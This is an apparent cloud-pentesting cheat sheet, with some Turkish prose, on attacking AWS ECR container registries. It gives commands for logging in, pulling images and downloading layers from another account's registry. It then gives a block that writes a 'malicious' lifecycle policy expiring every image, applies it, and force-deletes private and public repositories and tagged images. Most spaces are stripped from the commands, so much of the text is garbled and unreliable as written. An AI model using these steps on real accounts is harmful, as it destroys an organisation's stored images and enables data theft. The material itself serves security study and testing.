# Docker login into ecr## For public repo (always use us-east-1)awsecr-publicget-login-password--regionus-east-1|dockerlogin--usernameAWS--password-stdinpublic.ecr.aws/<random-id>## For private repoawsecrget-login-password--profile<profile_name>--region<region>|dockerlogin--usernameAWS--password-stdin<account_id>.dkr.ecr.<region>.amazonaws.com## If you need to acces an image from a repo if a different account, in <account_id> set the account number of the other account# Downloaddockerpull<account_id>.dkr.ecr.<region>.amazonaws.com/<repo_name>:latest## If you still have the error "Requested image not found"## It might be because the tag "latest" doesn't exit## Get valid tags with:TOKEN=$(aws--profile<profile>ecrget-authorization-token--outputtext--query'authorizationData[].authorizationToken')curl-i-H"Authorization: Basic $TOKEN"https://<account_id>.dkr.ecr.<region>.amazonaws.com/v2/<img_name>/tags/list# Inspect the imagedockerinspectsha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0# Upload (example uploading purplepanda with tag latest)dockertagpurplepanda:latest<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latestdockerpush<account_id>.dkr.ecr.<region>.amazonaws.com/purplepanda:latest# Downloading without Docker# List digestsawsecrbatch-get-image--repository-namelevel2 \--registry-id 653711331788 \--image-ids imageTag=latest|jq'.images[].imageManifest | fromjson'## Download a digestawsecrget-download-url-for-layer \--repository-name level2 \--registry-id 653711331788 \--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a"
Görüntüleri indirdikten sonra hassas bilgileri kontrol etmelisiniz:
Bu izinlerden herhangi birine sahip bir saldırgan, depolama alanındaki tüm görüntüleri silmek için bir yaşam döngüsü politikası oluşturabilir veya değiştirebilir ve ardından tüm ECR deposunu silebilir. Bu, depoda saklanan tüm konteyner görüntülerinin kaybına yol açar.
bashCopycode#CreateaJSONfilewiththemaliciouslifecyclepolicyecho'{"rules": [{"rulePriority": 1,"description": "Delete all images","selection": {"tagStatus": "any","countType": "imageCountMoreThan","countNumber": 0},"action": {"type": "expire"}}]}'>malicious_policy.json# Apply the malicious lifecycle policy to the ECR repositoryawsecrput-lifecycle-policy--repository-nameyour-ecr-repo-name--lifecycle-policy-textfile://malicious_policy.json# Delete the ECR repositoryawsecrdelete-repository--repository-nameyour-ecr-repo-name--force# Delete the ECR public repositoryawsecr-publicdelete-repository--repository-nameyour-ecr-repo-name--force# Delete multiple images from the ECR repositoryawsecrbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0# Delete multiple images from the ECR public repositoryawsecr-publicbatch-delete-image--repository-nameyour-ecr-repo-name--image-idsimageTag=latestimageTag=v1.0.0
